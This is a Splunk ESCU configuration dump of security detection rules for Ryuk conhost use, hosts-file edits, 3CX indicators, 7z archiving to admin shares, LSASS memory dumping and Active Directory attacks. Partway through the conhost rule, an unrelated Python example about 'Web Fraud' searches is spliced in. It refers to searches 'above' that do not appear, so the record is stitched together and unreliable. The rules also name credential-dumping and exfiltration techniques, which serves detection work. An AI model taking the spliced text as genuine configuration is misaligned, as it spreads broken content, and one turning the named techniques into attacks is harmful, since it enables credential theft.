you have any questions feel free to email us at: research@splunk.com. 
The search looks for the Console Window Host process (conhost.exe) executed using the force flag -ForceV1. This is not regular behavior in the Windows OS and is often seen executed by the Ryuk Ransomware. DEPRECATED: this event is also seen on the Windows 10 client of attack_range_local; after further testing we realized this is not specific to Ryuk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for the Console Window Host process (conhost.exe) executed using the force flag -ForceV1. This is not regular behavior in the Windows OS and is often seen executed by the Ryuk Ransomware. DEPRECATED: this event is also seen on the Windows 10 client of attack_range_local; after further testing we realized this is not specific to Ryuk. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
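The Web Fraud - Account Harvesting and Web Fraud - Password Sharing Across Accounts searches above both start by pulling `login[username]` (and, for the second, `login[password]`) out of the form_data field of Magento2 loginPost requests, then count distinct usernames per email domain or per password. The Python below is an added example, not ESCU content: the events are constructed, the uri/src_ip/form_data field names mirror the SPL, and the password is hashed before aggregation, which is the tokenized form the how_to_implement text asks for.

```python
"""Added example (not ESCU code): the aggregations behind the ESCU 'Web Fraud - Account
Harvesting' and 'Web Fraud - Password Sharing Across Accounts' searches, re-implemented in
Python over constructed Magento-style loginPost events (fields uri, src_ip, form_data)."""
import hashlib
from collections import defaultdict
from urllib.parse import parse_qs

LOGIN_URI = "/magento2/customer/account/loginPost/"


def make_events():
    """Constructed sample events, not real traffic: 30 accounts on one throwaway email domain
    (harvesting), 6 different accounts using one password (sharing), one ordinary login and
    one non-login request that the uri filter must drop."""
    events = []
    for i in range(30):
        events.append({"uri": LOGIN_URI, "src_ip": f"203.0.113.{i % 7}",
                       "form_data": f"login%5Busername%5D=user{i:02d}%40burner.example&login%5Bpassword%5D=Pw{i}%21"})
    for i in range(6):
        events.append({"uri": LOGIN_URI, "src_ip": "198.51.100.9",
                       "form_data": f"login%5Busername%5D=person{i}%40mail.example&login%5Bpassword%5D=Winter2024%21"})
    events.append({"uri": LOGIN_URI, "src_ip": "192.0.2.5",
                   "form_data": "login%5Busername%5D=alice%40corp.example&login%5Bpassword%5D=s3cret"})
    events.append({"uri": "/magento2/catalog/", "src_ip": "192.0.2.5", "form_data": ""})
    return events


def extract_login(event):
    """The uri filter plus the two `rex field=form_data "login\\[username\\]=..."` /
    `"login\\[password\\]=..."` extractions.  parse_qs decodes the form encoding, so the key
    is 'login[username]' even when the browser sent login%5Busername%5D.  Returns
    (Username, Password) or None."""
    if not event.get("uri", "").startswith("/magento2/customer/account/loginPost"):
        return None
    fields = parse_qs(event.get("form_data", ""))
    username = fields.get("login[username]", [None])[0]
    password = fields.get("login[password]", [None])[0]
    if not username or password is None:
        return None
    return username, password


def email_domain(username):
    """`rex field=Username "@(?<email_domain>.*)"`; None when the username is not an address."""
    return username.split("@", 1)[1] if "@" in username else None


def password_token(password):
    """Aggregate on a token, never on the cleartext.  An unsalted SHA-256 is equality-preserving,
    so dc(Username) by token equals dc(Username) by Password, but the stored value is not the
    secret itself.  It is still offline-guessable, so treat the token as sensitive too."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def account_harvesting(events, threshold=25):
    """`stats dc(Username) as UniqueUsernames by email_domain | where UniqueUsernames>25`."""
    users_by_domain = defaultdict(set)
    for event in events:
        hit = extract_login(event)
        if hit is None:
            continue
        domain = email_domain(hit[0])
        if domain:
            users_by_domain[domain].add(hit[0])
    return {d: len(u) for d, u in users_by_domain.items() if len(u) > threshold}


def password_sharing(events, threshold=5):
    """`stats dc(Username) as UniqueUsernames values(Username) as user list(src_ip) as src_ip
    by Password | where UniqueUsernames>5`, keyed by password_token instead of Password."""
    rows = defaultdict(lambda: {"user": set(), "src_ip": []})
    for event in events:
        hit = extract_login(event)
        if hit is None:
            continue
        row = rows[password_token(hit[1])]
        row["user"].add(hit[0])
        row["src_ip"].append(event["src_ip"])
    return {token: {"UniqueUsernames": len(r["user"]), "user": sorted(r["user"]), "src_ip": r["src_ip"]}
            for token, r in rows.items() if len(r["user"]) > threshold}


if __name__ == "__main__":
    events = make_events()
    print("harvesting:", account_harvesting(events))
    for token, row in password_sharing(events).items():
        print("shared password", token[:12] + "...", row["UniqueUsernames"], row["user"])
```

On the constructed data only burner.example (30 accounts) and the one shared password (6 accounts) cross the thresholds; mail.example stays under the harvesting limit with 6 registrations, which is the gap the known_false_positives text suggests closing by counting on a device ID or by baselining per domain over a longer window.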
action.escu.known_false_positives = This process should not be run forcefully; we have not seen any false positives for this detection. action.escu.creation_date = 2020-11-06 action.escu.modification_date = 2020-11-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows connhost exe started forcefully - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ryuk Ransomware"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Windows connhost exe started forcefully - Rule action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for the Console Window Host process (conhost.exe) executed using the force flag -ForceV1. This is not regular behavior in the Windows OS and is often seen executed by the Ryuk Ransomware. DEPRECATED: this event is also seen on the Windows 10 client of attack_range_local; after further testing we realized this is not specific to Ryuk. 
action.notable.param.rule_title = Windows connhost exe started forcefully action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process="*C:\\Windows\\system32\\conhost.exe* 0xffffffff *-ForceV1*" by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `windows_connhost_exe_started_forcefully_filter` [ESCU - Windows hosts file modification - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search looks for modifications to the hosts file on all Windows endpoints across your environment. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for modifications to the hosts file on all Windows endpoints across your environment. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records the file-system activity from your hosts to populate the Endpoint.Filesystem data model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or by other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes. 
action.escu.known_false_positives = There may be legitimate reasons for system administrators to add entries to this file. action.escu.creation_date = 2018-11-02 action.escu.modification_date = 2018-11-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows hosts file modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Host Redirection"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Windows hosts file modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Host Redirection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for modifications to the hosts file on all Windows endpoints across your environment. 
action.notable.param.rule_title = Windows hosts file modification action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.file_path Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | search Filesystem.file_name=hosts AND Filesystem.file_path=*Windows\\System32\\* | `drop_dm_object_name(Filesystem)` | `windows_hosts_file_modification_filter` [ESCU - 3CX Supply Chain Attack Network Indicators - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The analytic provided below employs the Network_Resolution datamodel to detect domain indicators associated with the 3CX supply chain attack. By leveraging this query, you can efficiently conduct retrospective analysis of your data to uncover potential compromises. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution"] action.escu.eli5 = The analytic provided below employs the Network_Resolution datamodel to detect domain indicators associated with the 3CX supply chain attack. By leveraging this query, you can efficiently conduct retrospective analysis of your data to uncover potential compromises. 
action.escu.how_to_implement = To successfully implement this search you need to be ingesting information into the `Network_Resolution` datamodel in the `DNS` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TAs are installed. action.escu.known_false_positives = False positives will be present for legitimate access to the 3cx[.]com website; remove that domain from the lookup as needed. action.escu.creation_date = 2023-03-30 action.escu.modification_date = 2023-03-30 action.escu.confidence = high action.escu.full_search_name = ESCU - 3CX Supply Chain Attack Network Indicators - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["3CX Supply Chain Attack"] action.risk = 1 action.risk.param._risk_message = Indicators related to 3CX supply chain attack have been identified on $src$. action.risk.param._risk = [{"risk_object_field": "src", "risk_object_type": "system", "risk_score": 100}, {"threat_object_field": "query", "threat_object_type": "url"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - 3CX Supply Chain Attack Network Indicators - Rule action.correlationsearch.annotations = {"analytic_story": ["3CX Supply Chain Attack"], "cis20": ["CIS 13"], "confidence": 100, "cve": ["CVE-2023-29059"], "impact": 100, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The analytic provided below employs the Network_Resolution datamodel to detect domain indicators associated with the 3CX supply chain attack. 
By leveraging this query, you can efficiently conduct retrospective analysis of your data to uncover potential compromises. action.notable.param.rule_title = 3CX Supply Chain Attack Network Indicators action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time) as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query | `drop_dm_object_name(DNS)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | lookup 3cx_ioc_domains domain as query OUTPUT Description isIOC | search isIOC=true | `3cx_supply_chain_attack_network_indicators_filter` [ESCU - 7zip CommandLine To SMB Share Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious 7z process with commandline pointing to SMB network share. This technique was seen in CONTI LEAK tools where it use 7z to archive a sensitive files and place it in network share tmp folder. This search is a good hunting query that may give analyst a hint why specific user try to archive a file pointing to SMB user which is un usual. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious 7z process with commandline pointing to SMB network share. This technique was seen in CONTI LEAK tools where it use 7z to archive a sensitive files and place it in network share tmp folder. This search is a good hunting query that may give analyst a hint why specific user try to archive a file pointing to SMB user which is un usual. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-08-17 action.escu.modification_date = 2021-08-17 action.escu.confidence = high action.escu.full_search_name = ESCU - 7zip CommandLine To SMB Share Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - 7zip CommandLine To SMB Share Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime 
max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name ="7z.exe" OR Processes.process_name = "7za.exe" OR Processes.original_file_name = "7z.exe" OR Processes.original_file_name = "7za.exe") AND (Processes.process="*\\C$\\*" OR Processes.process="*\\Admin$\\*" OR Processes.process="*\\IPC$\\*") by Processes.original_file_name Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.parent_process_id Processes.process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `7zip_commandline_to_smb_share_path_filter` [ESCU - Access LSASS Memory for Dump Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the dumping of the LSASS process memory, which occurs during credential dumping attacks.The detection is made by using Sysmon logs, specifically EventCode 10, which is related to lsass.exe. This helps to search for indicators of LSASS memory dumping such as specific call traces to dbgcore.dll and dbghelp.dll. This detection is important because it prevents credential dumping attacks and the theft of sensitive information such as login credentials, which can be used to gain unauthorized access to systems and data. False positives might occur due to legitimate administrative tasks. Next steps include reviewing and investigating each case, given the high risk associated with potential credential dumping attacks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the dumping of the LSASS process memory, which occurs during credential dumping attacks.The detection is made by using Sysmon logs, specifically EventCode 10, which is related to lsass.exe. 
This helps to search for indicators of LSASS memory dumping such as specific call traces to dbgcore.dll and dbghelp.dll. This detection is important because it prevents credential dumping attacks and the theft of sensitive information such as login credentials, which can be used to gain unauthorized access to systems and data. False positives might occur due to legitimate administrative tasks. Next steps include reviewing and investigating each case, given the high risk associated with potential credential dumping attacks. action.escu.how_to_implement = This search requires Sysmon Logs and a Sysmon configuration, which includes EventCode 10 for lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = Administrators can create memory dumps for debugging purposes, but memory dumps of the LSASS process would be unusual. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Access LSASS Memory for Dump Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["CISA AA23-347A", "Credential Dumping"] action.risk = 1 action.risk.param._risk_message = process $SourceImage$ injected into $TargetImage$ and was attempted dump LSASS on $dest$. Adversaries tend to do this when trying to accesss credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Access LSASS Memory for Dump Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Credential Dumping"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the dumping of the LSASS process memory, which occurs during credential dumping attacks.The detection is made by using Sysmon logs, specifically EventCode 10, which is related to lsass.exe. This helps to search for indicators of LSASS memory dumping such as specific call traces to dbgcore.dll and dbghelp.dll. This detection is important because it prevents credential dumping attacks and the theft of sensitive information such as login credentials, which can be used to gain unauthorized access to systems and data. False positives might occur due to legitimate administrative tasks. Next steps include reviewing and investigating each case, given the high risk associated with potential credential dumping attacks. 
action.notable.param.rule_title = Access LSASS Memory for Dump Creation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=10 TargetImage=*lsass.exe CallTrace=*dbgcore.dll* OR CallTrace=*dbghelp.dll* | stats count min(_time) as firstTime max(_time) as lastTime by dest, TargetImage, TargetProcessId, SourceImage, SourceProcessId | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `access_lsass_memory_for_dump_creation_filter` [ESCU - Account Discovery With Net App - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a potential account discovery series of command used by several malware or attack to recon the target machine. This technique is also seen in some note worthy malware like trickbot where it runs a cmd process, or even drop its module that will execute the said series of net command. This series of command are good correlation search and indicator of attacker recon if seen in the machines within a none technical user or department (HR, finance, ceo and etc) network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a potential account discovery series of command used by several malware or attack to recon the target machine. This technique is also seen in some note worthy malware like trickbot where it runs a cmd process, or even drop its module that will execute the said series of net command. This series of command are good correlation search and indicator of attacker recon if seen in the machines within a none technical user or department (HR, finance, ceo and etc) network. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Admin or power user may used this series of command. action.escu.creation_date = 2023-01-04 action.escu.modification_date = 2023-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Account Discovery With Net App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trickbot", "IcedID"] action.risk = 1 action.risk.param._risk_message = Suspicious $process_name$ usage detected on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 5}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Account Discovery With Net App - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a potential account discovery series of command used by several malware or attack to recon the target machine. This technique is also seen in some note worthy malware like trickbot where it runs a cmd process, or even drop its module that will execute the said series of net command. This series of command are good correlation search and indicator of attacker recon if seen in the machines within a none technical user or department (HR, finance, ceo and etc) network. 
action.notable.param.rule_title = Account Discovery With Net App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` AND (Processes.process="* user *" OR Processes.process="*config*" OR Processes.process="*view /all*") by Processes.process_name Processes.dest Processes.user Processes.parent_process_name | where count >=4 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `account_discovery_with_net_app_filter` [ESCU - Active Directory Lateral Movement Identified - Rule] action.escu = 0 action.escu.enabled = 1 description = The primary objective of this correlation rule is to detect and alert on potential lateral movement activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Lateral Movement analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Lateral Movement analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The primary objective of this correlation rule is to detect and alert on potential lateral movement activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Lateral Movement analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Lateral Movement analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. action.escu.how_to_implement = Splunk Enterprise Security is required to utilize this correlation. In addition, modify the source_count value to your environment. In our testing, a count of 4 or 5 was decent in a lab, but the number may need to be increased as the analytic story includes over 30 analytics. In addition, based on false positives, modify any analytics to be anomaly and lower or increase risk based on organization importance. action.escu.known_false_positives = False positives will most likely be present based on risk scoring and how the organization handles system to system communication. Filter, or modify as needed. In addition to count by analytics, adding a risk score may be useful. In our testing, with 22 events over 30 days, the risk scores ranged from 500 to 80,000. Your organization will be different, monitor and modify as needed. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Active Directory Lateral Movement Identified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Lateral Movement"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Active Directory Lateral Movement Identified - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The primary objective of this correlation rule is to detect and alert on potential lateral movement activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Lateral Movement analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Lateral Movement analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. 
action.notable.param.rule_title = RBA: Active Directory Lateral Movement Identified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Active Directory Lateral Movement" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 4 | `active_directory_lateral_movement_identified_filter` [ESCU - Active Directory Privilege Escalation Identified - Rule] action.escu = 0 action.escu.enabled = 1 description = The primary objective of this correlation rule is to detect and alert on potential privilege escalation activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Privilege Escalation analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. 
The correlation rule will trigger an alert when multiple analytics from the Active Directory Privilege Escalation analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The primary objective of this correlation rule is to detect and alert on potential privilege escalation activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Privilege Escalation analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Privilege Escalation analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. action.escu.how_to_implement = Splunk Enterprise Security is required to utilize this correlation. In addition, modify the source_count value to your environment. In our testing, a count of 4 or 5 was decent in a lab, but the number may need to be increased as the analytic story includes over 30 analytics. In addition, based on false positives, modify any analytics to be anomaly and lower or increase risk based on organization importance. action.escu.known_false_positives = False positives will most likely be present based on risk scoring and how the organization handles system to system communication. Filter, or modify as needed. 
